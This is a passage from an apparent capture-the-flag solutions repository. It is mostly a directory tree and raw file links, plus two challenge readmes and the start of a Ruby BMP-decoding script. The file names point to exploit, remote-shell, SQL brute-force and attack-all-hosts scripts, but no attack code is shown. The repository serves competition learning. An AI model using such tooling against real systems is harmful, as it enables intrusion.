├── 2010.ructf ├── cgi-bin │ ├── actions │ │ ├── 99 │ │ ├── echo │ │ ├── fact │ │ ├── get │ │ ├── hello │ │ ├── hint │ │ └── set │ ├── data │ │ ├── qwer │ │ └── readme.txt │ ├── encrypted_src │ │ ├── default │ │ ├── emulator.c │ │ ├── emulator.c.gpg │ │ └── readme.txt │ ├── launch │ └── launch_decompiled_part.c └── reversing │ ├── bmp2hex.rb │ ├── decoder.rb │ ├── emulation.c │ ├── emulator.rb │ ├── hint.arg │ ├── hint.txt │ ├── launch │ ├── launch.c │ ├── work 100% │ ├── 99 │ ├── echo │ ├── fact │ ├── hello │ ├── hint │ └── set │ └── work 90% │ └── get ├── 2010.ructfe ├── nibbles.tar.gz ├── photos.hack │ ├── autosubmitter.rb │ ├── check_mysql.rb │ ├── lx │ └── old.dat ├── photos.task │ ├── avatar.pl │ ├── avatar1.pl │ ├── create_avatar.pl │ ├── database.db │ ├── escape.rb │ ├── files │ │ ├── css │ │ │ └── main.css │ │ ├── image │ │ │ ├── back.jpg │ │ │ ├── button.png │ │ │ ├── knight.png │ │ │ ├── logo.png │ │ │ ├── plus.png │ │ │ └── void.gif │ │ └── javascript │ │ │ ├── jquery-ui.min.js │ │ │ ├── jquery.min.js │ │ │ └── main.js │ ├── main.rb │ └── views │ │ ├── ads.haml │ │ ├── albums.haml │ │ ├── create_album.haml │ │ ├── header.haml │ │ ├── index.haml │ │ ├── login_form.haml │ │ ├── navigation.haml │ │ ├── show_pictures.haml │ │ └── upload_pictures.haml └── trojanXXX.gz ├── 2011.csaw ├── 100.forensics101 │ ├── README │ └── cutyoface.zip ├── 100.reversing101+ │ ├── 0_fixie.jar │ ├── 1_binary_string │ ├── 2_xorer.rb │ └── README.md ├── 200.net.hardware+ │ ├── 1.jpg │ ├── 1.rb │ ├── 2.jpg │ ├── capture.pcap │ ├── data0 │ ├── data0.bin │ ├── data0.jpg │ ├── data1 │ ├── data1.bin │ ├── data2 │ ├── data2.bin │ ├── data3 │ ├── data3.bin │ ├── data4 │ ├── data4.bin │ ├── data5 │ ├── data5.bin │ ├── data6 │ ├── data6.bin │ ├── data7 │ ├── data7.bin │ ├── data8 │ └── data8.bin ├── 400.net.patch.mgmt+ │ ├── README │ ├── capture.pcap │ ├── keygen │ ├── ssh_decoder.rb │ ├── ssh_decoder2.rb │ ├── z1.sh │ └── z2.sh ├── README.md └── exploit.200 │ ├── 1.c │ ├── 1.rb │ ├── bin1 │ ├── gdbscript │ ├── key │ └── motr ├── 2011.defcon19-quals ├── f100 │ ├── 450x42.png │ ├── 761x25.png │ ├── README │ ├── enum_sizes.rb │ ├── f100_fb8149b6f6eaef95d38.png │ ├── fix_crc.rb │ └── fix_size.rb └── f400 │ ├── README │ ├── bin │ ├── dd │ ├── decode.rb │ └── strings │ ├── rm_md5.rb │ ├── wad_ddtek.bin │ └── wad_jailbreakme.bin ├── 2011.hacklu ├── 100.python.crackme │ ├── brute.rb │ ├── crackme.pyc │ ├── crackme.txt │ └── solve.rb ├── 100.scotty.last.signal+ │ ├── 0_mario.nes │ ├── 1.rb │ ├── 2_diff.fc │ ├── 2_original_game.nes │ ├── 3_fc2bin.rb │ ├── 4_bin │ ├── 5_add.rb │ └── ANSWER ├── 150.borg.binary │ ├── README │ ├── borgbinary │ ├── gen.rb │ ├── hash.c │ └── hexdump.h ├── 200.simplexor+ │ ├── simplexor.txt │ └── solve.rb ├── 200.unknown.planet+ │ ├── 0_8c4f14e28155a2c3cf4b2538c1e0958b.jpg │ ├── 1_analyze_jpeg │ ├── 2_manually_guess_chunk_order.rb │ ├── 3_decode.rb │ ├── ANSWER │ └── chunks │ │ ├── chunk.0.uvlSlG3Tgow │ │ ├── chunk.1.5IIUED7GheR │ │ ├── chunk.2.rySOWi4fZkA │ │ ├── chunk.3.87F1s5POUJc │ │ ├── chunk.4.6JXtwsTTh9k │ │ ├── chunk.5.Uw105aD3qYh │ │ ├── chunk.6.BPiIOASG_Z6 │ │ ├── chunk.7.Yui5oq58hlx │ │ └── chunk.8.nLPA8X0UJqf ├── 250.romulan.business.network │ └── Gwl4U5fqQZlJxEpPlgFL0hRNQrG4mmhg.pdf ├── 300.antique.space.shuttle+ │ ├── README │ ├── exploit_sources.zip │ ├── minisploit.c │ └── remote_homedir │ │ ├── auth │ │ ├── finger.py │ │ └── info ├── 300.deathstar.escape+ │ ├── README │ ├── sample.mp3 │ ├── save_mp3.rb │ └── solve.rb ├── README.textile ├── scoreboard.html ├── scoreboard.txt └── writeups.html ├── 2011.isec ├── q02+ │ ├── 2959f255b03b227d390a9de1b32c35da.exe │ ├── README │ ├── dokdo.png │ ├── read_proc_mem.py │ └── time_machine.bat ├── q06+ │ ├── 114.201.226.101 │ │ └── d0602c9017f5ae953f740ba7e844911d │ │ │ ├── index.php │ │ │ ├── index.php?no=1 │ │ │ ├── index.php?no=2 │ │ │ ├── index.php?no=3 │ │ │ ├── index.php?no=4 │ │ │ ├── index.php?no=5 │ │ │ └── index.php?no=6 │ ├── answer │ ├── blind_sql_brute.rb │ └── blind_sql_test.rb └── q09+ │ ├── README │ ├── del.rb │ ├── dump.rb │ ├── lol.pcap │ ├── repl.rb │ ├── result.wav │ ├── s1 │ ├── s1.del │ ├── s2 │ ├── s2.del │ └── test2 ├── 2011.ructf-quals ├── cry300 │ ├── 0_cry300.png │ ├── 1_cry300_deblock_rgb.png │ ├── 2_png2base64.rb │ ├── 3_base64 │ ├── 4_b64_to_spl.rb │ ├── 5_spl │ ├── 6_spl_replaced_names │ ├── 7_after_spl2c.c │ ├── 8_ANSWER │ ├── spl-1.2.1.tar.gz │ └── zpng.rb ├── rev200 │ ├── README │ ├── avrsimulatoridesetup151.exe │ ├── bin2font.rb │ ├── fc.rb │ ├── hex2bin.rb │ ├── key.bin │ ├── key.hex │ ├── key.txt │ ├── mem.bin │ └── mem.hex └── rev300 │ ├── README │ ├── brute.rb │ ├── check.rb │ ├── pe.exe │ ├── pe1.exe │ ├── shuffle.rb │ ├── tbl │ ├── tbl.rb │ └── tbl_shuffle.rb ├── 2011.ructf ├── rev200 │ ├── README │ ├── avrsimulatoridesetup151.exe │ ├── bin2font.rb │ ├── fc.rb │ ├── hex2bin.rb │ ├── key.bin │ ├── key.hex │ ├── key.idb │ └── key.txt └── rev300 │ ├── README │ ├── brute.rb │ ├── check.rb │ ├── pe.exe │ ├── pe1.exe │ ├── shuffle.rb │ ├── tbl │ ├── tbl.rb │ └── tbl_shuffle.rb ├── 2011.rwth ├── __info │ ├── README.txt │ ├── client.conf │ ├── codewars.txt │ ├── extract.rb │ ├── network.png │ ├── rwthctfca.pem │ ├── secret.txt │ ├── ta.key │ ├── team77.cert │ └── team77.key ├── forum │ ├── README │ ├── admin │ │ ├── addcats.php │ │ ├── addgroups.php │ │ ├── addusers.php │ │ ├── adminsql.php │ │ ├── isadmin.php │ │ └── manage.php │ ├── categories.php │ ├── dbs │ │ └── psn.sqlite │ ├── fileoverview.php │ ├── includes │ │ ├── admin.inc.php │ │ ├── cats.inc.php │ │ ├── fileups.inc.php │ │ ├── footer.inc.php │ │ ├── header.inc.php │ │ ├── msgs.inc.php │ │ ├── navi.inc.php │ │ ├── news.inc.php │ │ ├── posts.inc.php │ │ ├── sqlite.inc.php │ │ ├── uploads.inc.php │ │ ├── user.inc.php │ │ └── vars.inc.php │ ├── index.php │ ├── init.php │ ├── login.php │ ├── logout.php │ ├── mailbox.php │ ├── new_post.php │ ├── news.php │ ├── overview.php │ ├── posts.php │ ├── register.php │ ├── search.php │ ├── search_old.php │ ├── styles.css │ ├── tpls │ │ ├── templatef.inc.php │ │ └── templateh.inc.php │ ├── uploads.php │ └── uploads │ │ ├── 022e2c7799d9e186f52842ece57.810d │ │ ├── 05d67fa50cf9eb0989e225e9670.4f9f │ │ ├── 08c526f3ce6d88d86cd0281530f.28c1 │ │ ├── 0e232c4c8865dd83cc67cb70348.d60a │ │ ├── 1abf598bcf5d34ea3bec14fd1a8.a35c │ │ ├── 1b7ad75af3266085d590f489384.141b │ │ ├── 23584ba013b342a24f735feb085.003b │ │ ├── 24da07f918f9496bc7b0de26b06.77d2 │ │ ├── 255b7e516ac0d92e116be660668.66e4 │ │ ├── 2d754da69b0a43bbb1d359ba48e.fe56 │ │ ├── 2fa514a2b6b479da4f0775a1633.d923 │ │ ├── 3041142d8b9fd62b6d3a907c185.9755 │ │ ├── 48812b7bffc12d4c659af01c510.f6ea │ │ ├── 4a7e3008f6583a2177af4ce4873.eb4d │ │ ├── 4df1eafd7b519e926a949687801.ae6c │ │ ├── 53a510bfdebdef72fa2a8964c1b.cf55 │ │ ├── 552d7f814648b02b202d302c58f.a195 │ │ ├── 58bf1228b8826585a2846072431.6efd │ │ ├── 5a3f17d41a12a65deef4d4267d1.ad2e │ │ ├── 61e8df1cc760128225b9b261322.e16c │ │ ├── 62e33618e5de62d51d7077f1460.de01 │ │ ├── 65b0d2a31fb5483cebea49df5ec.ba2a │ │ ├── 7b3f430783f125fd57e24b27856.3ae3 │ │ ├── 7cb9e8da473df86462d310479bb.2633 │ │ ├── 7da0c41335cac8173cc706cf066.9b30 │ │ ├── 7fb5d6c40692d56edcaf0d6da5f.a3c4 │ │ ├── 862692b6a9e032b804122f7c94b.f746 │ │ ├── 8b09a0f2dc09a15a4e42f52a361.8d2b │ │ ├── 981a754bd1e47166eddf5ac3545.f290 │ │ ├── 98cd49bbae0d5113a81e54cc506.cf44 │ │ ├── 9fc3ca92308a9361480329ed0f0.684d │ │ ├── a0288bab76d51d5a4a5a5b13f74.3732 │ │ ├── afcd92e7e3677726444dbbb0f3b.1497 │ │ ├── b248e88a8a8d1b02cb76644a76e.1ef7 │ │ ├── c2791de6325913519c8be000e2d.8363 │ │ ├── d5466209bc9cd807d8c30ba0d66.3d1a │ │ ├── d6d51cfc57348f077d120c9828c.6928 │ │ ├── d84eb0c84aa96088276f6e9ad88.a95a │ │ ├── d9775f4b8e3f1b13c782d2ecf1a.a9b7 │ │ ├── d9bd8e8c7df0bad163c161294a7.e650 │ │ ├── dcfb99634ebb2f2ec8e8ed03663.07e3 │ │ ├── e0a90af7a9140fb1675179271b1.a443 │ │ ├── f5a3c08c5bd245c1dcabe8eedda.f1b8 │ │ ├── fcdf0951d678b44dd3e142b9586.e34e │ │ └── index.php ├── mmd │ ├── mmd.db │ ├── mmd.rb │ └── mmd.rb.bk ├── mmd_exploit.rb ├── mongo_brute.rb ├── mongo_change_admin_pass.rb ├── mongo_dump.rb ├── nfsv5 │ ├── __mongodb_database.tgz │ ├── nfsv5 │ │ ├── __init__.py │ │ ├── __init__.pyc │ │ ├── data.py │ │ ├── data.pyc │ │ ├── dynamicnoncesystem.py │ │ ├── dynamicnoncesystem.pyc │ │ ├── include │ │ │ ├── __init__.py │ │ │ ├── __init__.pyc │ │ │ ├── fieldtypes.py │ │ │ ├── fieldtypes.pyc │ │ │ ├── helpers.py │ │ │ ├── helpers.pyc │ │ │ ├── ndrlib.py │ │ │ ├── ndrlib.pyc │ │ │ ├── packet.py │ │ │ ├── packet.pyc │ │ │ ├── smbfields.py │ │ │ └── smbfields.pyc │ │ ├── msgblock.py │ │ ├── msgblock.pyc │ │ ├── pwrweb.py │ │ ├── pwrweb.pyc │ │ ├── querymod.pyc │ │ ├── rpcservices.py │ │ └── rpcservices.pyc │ └── start.py ├── nfsv5_mongodb_exploit.rb ├── office │ ├── README │ ├── infix.rb │ ├── notes.rb │ ├── notes │ │ ├── 11dea2d28c │ │ ├── 12ef3a5636 │ │ ├── 1412de8110 │ │ ├── 1761c27d39 │ │ ├── 179819ef53 │ │ ├── 1af8dad932 │ │ ├── 1b71463b38 │ │ ├── 1c7f7ea9e7 │ │ ├── 1c948d1fd5 │ │ ├── 1e6e675e7a │ │ ├── 2118d5526e │ │ ├── 21e50c75c │ │ ├── 2844fa13c1 │ │ ├── 28dedeaeb7 │ │ ├── 2e38714cc5 │ │ ├── 2e7af9f22e │ │ ├── 384e4a29cf │ │ ├── 39c2389b2a │ │ ├── 39fd523490 │ │ ├── 3a035dca7 │ │ ├── 3e3a14a381 │ │ ├── 3f4957fd75 │ │ ├── 3fdfeb9959 │ │ ├── 4023d17a27 │ │ ├── 40865b5e95 │ │ ├── 40bd868b78 │ │ ├── 40e3b4ce58 │ │ ├── 447fdf5101 │ │ ├── 454a9bd038 │ │ ├── 4725520052 │ │ ├── 47f12f9362 │ │ ├── 48ac2956ac │ │ ├── 49cfdb8410 │ │ ├── 4d63feb72a │ │ ├── 4dd83eec01 │ │ ├── 50ca0c11a9 │ │ ├── 55065434d6 │ │ ├── 5604a2d25a │ │ ├── 5778f52028 │ │ ├── 59c66e91f3 │ │ ├── 5a7807044 │ │ ├── 5e7f24f36 │ │ ├── 5ef3004dca │ │ ├── 62cddabc8 │ │ ├── 65ff1abd5c │ │ ├── 6600c732c5 │ │ ├── 6628c4cda0 │ │ ├── 67b22cd7b3 │ │ ├── 6862f089c9 │ │ ├── 6b2ceaade8 │ │ ├── 6bb3882be2 │ │ ├── 7211779d30 │ │ ├── 762317c0f6 │ │ ├── 7637abbcd3 │ │ ├── 7726e5be34 │ │ ├── 77633045cf │ │ ├── 7eafd84f9b │ │ ├── 802cda5e79 │ │ ├── 80345cc2ba │ │ ├── 83e7bd2507 │ │ ├── 85e236c1ca │ │ ├── 85e7e70c03 │ │ ├── 869d75bff6 │ │ ├── 87154a9942 │ │ ├── 87c124e4f0 │ │ ├── 889cc7362e │ │ ├── 894acc680a │ │ ├── 8bc6ece8e6 │ │ ├── 8bd0f79c98 │ │ ├── 8c3d285f7c │ │ ├── 8c63b4f51 │ │ ├── 8d7a8a899d │ │ ├── 8e909bdc53 │ │ ├── 90f5656b0f │ │ ├── 910da102e4 │ │ ├── 933f184550 │ │ ├── 950d83d8b4 │ │ ├── 954bda793a │ │ ├── 97fe95b443 │ │ ├── 988df52a5e │ │ ├── 9a1ab6a5f5 │ │ ├── 9ccb135565 │ │ ├── 9dfce2c04 │ │ ├── a0a953e7d1 │ │ ├── a3ef139b73 │ │ ├── a5a0a484b6 │ │ ├── a66fa565c1 │ │ ├── aab677d2c3 │ │ ├── ac4dda1f13 │ │ ├── ae4e923ac9 │ │ ├── aff209f686 │ │ ├── b17f0dee94 │ │ ├── b1acc539cc │ │ ├── b1fdd932a6 │ │ ├── b33b437859 │ │ ├── b3e178f5db │ │ ├── b51dd3af91 │ │ ├── b5eeb84654 │ │ ├── b7f51bf578 │ │ ├── b968c6823c │ │ ├── bac3662565 │ │ ├── bcab827652 │ │ ├── c03a48669d │ │ ├── ca0f596087 │ │ ├── cd4563d69b │ │ ├── cd8d45f708 │ │ ├── ceeddf887c │ │ ├── d2d474a540 │ │ ├── db678ea49c │ │ ├── e23403eafb │ │ └── e4c918f4ed │ ├── rpn.rb │ └── server.rb ├── office_multisploit.rb └── ps3game │ ├── Makefile │ ├── cache │ ├── -NYlRf0Vm3gUoAd-GzdMgw-- │ ├── -byV6I5VAZqesnqotKzFLA-- │ ├── -hzM5Ei6EI+04Y9+q+I-Ag-- │ ├── 08Y2xZh-lxVZ5HA0-I2Pug-- │ ├── 0I6eHlb8u3IHIDH6BCwv9g-- │ ├── 0dqdDpZt7XeV-nhmvkSBGQ-- │ ├── 18L1JiNWibJ7rDLm1YwJTg-- │ ├── 2U4SQOO3iCcifBa9vqlUQQ-- │ ├── 2W7A0bqemVTlRAx0aG78VQ-- │ ├── 2i5WPp3nSsdBdE3nfXr+6A-- │ ├── 3BMew-PHPeP0LUTPHHwm9A-- │ ├── 3jlB85BFUru4QstRJ78ucA-- │ ├── 3qwTLbUejhIkE-ATGxC7QA-- │ ├── 5MJyHpJ4G10O1zNZBFcPFg-- │ ├── 5QSLHkPG2TKRCoBonacOng-- │ ├── 6-9Vv8xYuQMR1K9IwOL6tA-- │ ├── 6YO2Cf7DDAKxWLro19N3Gg-- │ ├── 7QTz4Nmfsvq3k4rwX0yDlQ-- │ ├── 8uGm0ZOpUd31XlGEfwTYZg-- │ ├── 9MbX2SbGyyZQ7EWBiNF-DQ-- │ ├── 9fenjsH2oEabd+d6WuuRFQ-- │ ├── A03QxoTt7LgYzXmy4BWyKw-- │ ├── ABq-Ia2TDG9UvrDICr5Npg-- │ ├── Abvm1Ql0wrtD9Tos+p4JlA-- │ ├── B+Elvl2WN9j68AfQ0QSecg-- │ ├── B6lQZ0t4NV7YXx-MmD2l6w-- │ ├── BRAaC8p7gp4p2a98eiqlqg-- │ ├── DN8vE-wntvUp9eKmEEOs-w-- │ ├── DyfARV0Cyw5-29UVwCcYKQ-- │ ├── FK7gFw30u2r-yiui+Tgz4Q-- │ ├── FKJeOBblG4eWEOWuVnSDag-- │ ├── FiAwUlKcn7mxgZUCjMEeYA-- │ ├── GJiEFB9AxIksxVGCkitVOA-- │ ├── H3KWAHsvdFomEJflE-+N9g-- │ ├── IGV7VEvykDw+3bwADql8Ig-- │ ├── J49L6HPy9QmbFJkjK-iPbA-- │ ├── JoY5tk64HqMRRbV+ofbbvQ-- │ ├── KTr8TH6h8I+0xu1iEYyXqQ-- │ ├── KzfQmoB8Kx9xyFGopE1HLA-- │ ├── LCfciUZz4PPg9dyApaCTew-- │ ├── LNgJL5a9M1DfmdnjSQkRtg-- │ ├── LrpV+M6G68xxiiAqhpiezw-- │ ├── MxQvogpYZnvbiPuqvVXBuw-- │ ├── Mz72WvAATzoNFJ0qno5n1g-- │ ├── OHUkKFwYjsJoUXqbWsy-bw-- │ ├── PIuFazzvNvAl9brZvwxWsQ-- │ ├── PPaNMqGCtVVVpcAKaIqAfw-- │ ├── PVfmLGySkBCbrEPMGJiBXQ-- │ ├── PcEtPK7ze5vxuewAfqIuRg-- │ ├── PduRo95GSz87e3h7vSxPoA-- │ ├── PmN6yjVOgUJXGxaM9z+iYg-- │ ├── Q5TcpPllojISA9oIvD08+A-- │ ├── QDaeHSL2m81j35RqDPk-ow-- │ ├── Qinj40wn32l0HD8gUxcBuA-- │ ├── RFiqMlbwMxAhq1FSdpWrMQ-- │ ├── RFyrBKzjA2HIu4EBZHbDog-- │ ├── RiKKApO7M7RPXn+GdduyzQ-- │ ├── S79djgDrQRHWvTvWV1ES1Q-- │ ├── VE6UQgTyihVGlij0ZnfcZw-- │ ├── VI3ZZdwgX8c4tJbw-fNHFQ-- │ ├── Vt96P4fBy0c4oLzRGd5ZJQ-- │ ├── Wuy-wd8h2vdgo4R-NKt2HQ-- │ ├── Y+N0PA-tn6sjK3JxbKjjvQ-- │ ├── Y3FLzmBuQOifkoGQHGWY6g-- │ ├── YbZ9b1VWHKNJKd697KRvTw-- │ ├── Yt5k2GBkFPfLbeLwJynFqA-- │ ├── akoAEb0vGVj5ScS2eoJ06Q-- │ ├── dmWmSovAcK24XTl1G1UDBA-- │ ├── e-ms74D-6IqPdbA3JQ7shQ-- │ ├── etcYi4wsk1eW-NlAx4cH5g-- │ ├── f77e49hxpWVk7W0-5zT58A-- │ ├── g9ez1kSR0D+M4-O6-bFoYA-- │ ├── hc6LjPhDkZlZdC5NHab+1A-- │ ├── hpneofZAHH8jvIY6Hwqq8A-- │ ├── i7DSy-mxkmq+pGhpn26zcQ-- │ ├── iIdC3KeHQlR5GlxG9bb1Tw-- │ ├── ibx9lU+plsRpIMqmv5rTaA-- │ ├── jum7J9ygutQmblONKNWM4A-- │ ├── kYrG14gKULVI7rMpN9SBCQ-- │ ├── lITN2BeSSDJWUls1YLgwVA-- │ ├── n-gHgk1Bv22FUgznDDh3XQ-- │ ├── nDNOV-J1P0sv7MifuJyhQw-- │ ├── nkFqK18r8msnM9CyMl8Z5g-- │ ├── o3d99FjUWGZgcvOf--b18Q-- │ ├── pI8XaqAYsC8uv0Jdx8yOKg-- │ ├── pL7yZfnrqvBc8hQKToseHA-- │ ├── ptqPZwFsP4xTK8--or+VCg-- │ ├── pucUxcDh7gRlrbX+KKlSVQ-- │ ├── pxS4Yugb7mEtEBATlzM64A-- │ ├── qcNa-SrW8KociKBEFY19Hg-- │ ├── sfBTHPk8qAgY63Aq+68pnQ-- │ ├── tkx5Qtdfw-nGrIQ-E+aK+g-- │ ├── v+nbJtH7WzodBbzKWU7kEw-- │ ├── v2arp7CudT4QzI+Lh1w2aA-- │ ├── vZntf9gy29ip1Op4qJsGTg-- │ ├── wMCldWf9U7TDC7+un0MKjQ-- │ ├── xD6FIoBjhVWmT9e1BFY-rg-- │ ├── y4y7r5pGvTp9oo08VtM6jg-- │ └── z7042O3VJUBuTJxua7pLzg-- │ ├── codeserv.ko │ ├── exploit │ ├── exploit.bin │ ├── exploit.c │ ├── exploit.s │ ├── import.c │ ├── load.sh │ ├── ps3game │ ├── ps3game.c │ └── ps3gamedbg ├── 2011.school-ctf └── kvadrat │ ├── README.md │ └── solve.rb ├── 2012.phdays-quals ├── bin100 │ ├── 0.exe │ ├── 1.deupx.exe │ └── 2.restored.exe ├── bin200 │ ├── clicker.rb │ ├── firmware.hex │ └── picrackme.DSN ├── f100 │ ├── 0.png │ ├── 1_qr_decoded.txt │ ├── 2.bin │ ├── 2.bin.strings-pasword-for-rar │ ├── 3_steg_all_extract.rb │ ├── 4_all.1.dat │ ├── 5_hex2rar.rb │ ├── 6.rar │ └── secret.txt ├── f300 │ ├── 0.hilbert │ ├── 1.first_hint │ ├── 2.gen_data_using_faker │ ├── 2.sinatra-qr-faker.rb │ ├── 3_idx2xy.rb │ ├── 4_idx2xy.yml │ ├── 5_restore_original.rb │ └── answer.png ├── pwn100 │ └── attack.rb ├── pwn300 │ ├── 0.process.pyc │ ├── 0.web.py │ └── 1.remote_shell_exploit.sh └── pwn400 │ ├── 0.pyjail.py │ ├── 0.secure_reader.py │ └── attack.log ├── 2012.polictf └── gb200 │ ├── 0_challenge_1.jpg │ ├── 0_challenge_2.jpg │ ├── 1_hint1.pdf │ ├── 2_hint2.jpg │ ├── 3_answer.rb │ ├── 3_solving_process_scan.jpg │ └── README.txt ├── 2012.ructfe ├── geo1.pcap ├── geo2.pcap ├── geo3.pcap ├── geo4.pcap ├── geotracker │ ├── geotracker.jar │ ├── geotracker.sh │ ├── localDB.properties │ ├── localDB.script │ ├── push-server.xml │ └── source │ │ ├── makefile │ │ ├── pom.xml │ │ └── src │ │ ├── geotracker.sh │ │ ├── main │ │ ├── java │ │ │ └── org │ │ │ │ └── ructf │ │ │ │ └── ructfe2012 │ │ │ │ └── geotracker │ │ │ │ └── push │ │ │ │ └── server │ │ │ │ ├── Client.java │ │ │ │ ├── Constants.java │ │ │ │ ├── IClient.java │ │ │ │ ├── IClientList.java │ │ │ │ ├── IKeepAliveReader.java │ │ │ │ ├── IListener.java │ │ │ │ ├── INotifiable.java │ │ │ │ ├── IPushable.java │ │ │ │ ├── IServiceRequest.java │ │ │ │ ├── IStartable.java │ │ │ │ ├── Listener.java │ │ │ │ ├── StartServer.java │ │ │ │ ├── notify │ │ │ │ ├── INotificationClient.java │ │ │ │ ├── INotificationRepository.java │ │ │ │ ├── Notification.java │ │ │ │ ├── NotificationClient.java │ │ │ │ ├── NotificationListener.java │ │ │ │ └── NotificationRepository.java │ │ │ │ └── push │ │ │ │ ├── IPushClient.java │ │ │ │ ├── PushClient.java │ │ │ │ └── PushListener.java │ │ └── resources │ │ │ ├── log4j.properties │ │ │ ├── persistence.xml │ │ │ └── system.properties │ │ ├── makefile │ │ └── push-server.xml ├── geotracker_attack.rb └── geotracker_attack_all_hosts.sh ├── 2012.rwth ├── _pcaps.7z ├── azurecoast │ ├── attack.rb │ ├── attack_local.rb │ ├── attack_test.rb │ ├── azure_attack_all_hosts.sh │ ├── data │ │ └── ascii2hash.yml │ ├── enum.rb │ ├── enum2.rb │ ├── enum3.rb │ ├── rwthctfvm │ │ ├── compiler.rb │ │ ├── cpu │ │ │ ├── cpu.go │ │ │ ├── dissassembler.go │ │ │ ├── instr.go │ │ │ └── pfile.go │ │ ├── data │ │ │ ├── 1.rb │ │ │ ├── img.go │ │ │ └── out.bin │ │ ├── libmem.rb │ │ ├── main.go │ │ ├── make.sh │ │ ├── rwthctfvm │ │ ├── storage_gen.rb │ │ ├── storage_gen2.rb │ │ ├── string.rb │ │ └── vm.txt │ ├── step1.log │ ├── storage │ │ └── f5aLthVhbEYHsmxn0 │ ├── stream1.pcap │ ├── stream2.pcap │ ├── stream5.pcap │ └── vm.txt ├── ezpz │ ├── ezpz.tgz │ └── ezpz_attack.rb ├── tattle │ ├── tattle │ ├── tattle.go │ ├── tattle_attack.rb │ └── tattle_attack_all_hosts.sh └── zork │ ├── zork │ ├── zork_attack.rb │ ├── zork_attack_all_hosts.sh │ └── zork_patched ├── 2014.ructf-quals ├── 100.steg.cats_eye │ ├── solve.rb │ ├── sugar.png │ ├── task-0.png │ ├── task-1.png │ ├── task-2.png │ ├── task-3.png │ ├── task-4.png │ ├── task-5.png │ ├── task-6.png │ ├── task-7.png │ └── task.gif ├── 200.reversing.no_harm │ ├── HARM.DAT │ ├── README │ ├── harm.unpacked.fixed.exe │ ├── harm.unpacked.fixed.map │ ├── harm0597.zip │ ├── lsharm.rb │ ├── memdump2file.rb │ └── trx-drnk.rus ├── 300.admin.strange_image │ ├── _common.rb │ ├── answer.jpg │ ├── brute.rb │ ├── extract_chain.rb │ ├── find_ffd9.rb │ ├── lschain.rb │ ├── lsfat.rb │ ├── task.ima │ └── test_png.rb ├── 300.steg.nyan-task │ ├── nyan-task.png │ └── solve.rb └── 500.reversing.arcfour │ ├── arcfour.exe │ ├── arcfour.patched.loop.exe │ └── solve.rb ├── README.md ├── bright-shadows.net └── stegano_30_the_coast_guard │ ├── 1_img2text.rb │ ├── 2.txt │ ├── 3_decode.rb │ ├── README.md │ ├── stegano33.png │ └── the_key.png ├── docs └── Python arsenal for RE.pdf ├── hackquest.com └── steg-double-possibilities │ ├── 1-png2text.rb │ ├── 2.txt │ ├── 3-navajo2eng.rb │ ├── 4.txt │ ├── 5.rb │ ├── 6.txt │ ├── 7-answer.rb │ └── challenge.png ├── stuff ├── counter.gif ├── decompyle.patch ├── getkeys.py └── hexdump.c └── tools ├── clicker.rb └── png-repair-zlib-stream.rb /2010.ructf/cgi-bin/actions/99: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2010.ructf/cgi-bin/actions/99 -------------------------------------------------------------------------------- /2010.ructf/cgi-bin/actions/echo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2010.ructf/cgi-bin/actions/echo -------------------------------------------------------------------------------- /2010.ructf/cgi-bin/actions/fact: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2010.ructf/cgi-bin/actions/fact -------------------------------------------------------------------------------- /2010.ructf/cgi-bin/actions/get: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2010.ructf/cgi-bin/actions/get -------------------------------------------------------------------------------- /2010.ructf/cgi-bin/actions/hello: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2010.ructf/cgi-bin/actions/hello -------------------------------------------------------------------------------- /2010.ructf/cgi-bin/actions/hint: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2010.ructf/cgi-bin/actions/hint -------------------------------------------------------------------------------- /2010.ructf/cgi-bin/actions/set: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2010.ructf/cgi-bin/actions/set -------------------------------------------------------------------------------- /2010.ructf/cgi-bin/data/qwer: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2010.ructf/cgi-bin/data/qwer -------------------------------------------------------------------------------- /2010.ructf/cgi-bin/data/readme.txt: -------------------------------------------------------------------------------- 1 | key in 'qwer' is 123456789012345678901234567890 2 | -------------------------------------------------------------------------------- /2010.ructf/cgi-bin/encrypted_src/default: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2010.ructf/cgi-bin/encrypted_src/default -------------------------------------------------------------------------------- /2010.ructf/cgi-bin/encrypted_src/emulator.c.gpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2010.ructf/cgi-bin/encrypted_src/emulator.c.gpg -------------------------------------------------------------------------------- /2010.ructf/cgi-bin/encrypted_src/readme.txt: -------------------------------------------------------------------------------- 1 | Description key is the flag in 'default' 2 | -------------------------------------------------------------------------------- /2010.ructf/cgi-bin/launch: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2010.ructf/cgi-bin/launch -------------------------------------------------------------------------------- /2010.ructf/reversing/bmp2hex.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/ruby 2 | 3 | W = 500 4 | H = 300 5 | 6 | def pixel x,y 7 | @a[W*y+x] 8 | end 9 | 10 | def file2digest fname 11 | f = File.new(fname) 12 | 13 | # grab the bytes as an array 14 | bytes = f.each_byte.to_a 15 | 16 | @a = bytes[1078..-1] 17 | 18 | a = [] 19 | 0.upto(100) do |i| 20 | a << pixel(i,i) 21 | end 22 | 23 | r = [] 24 | 25 | 27.step((14*33),14).each do |x| 26 | n = 0 27 | 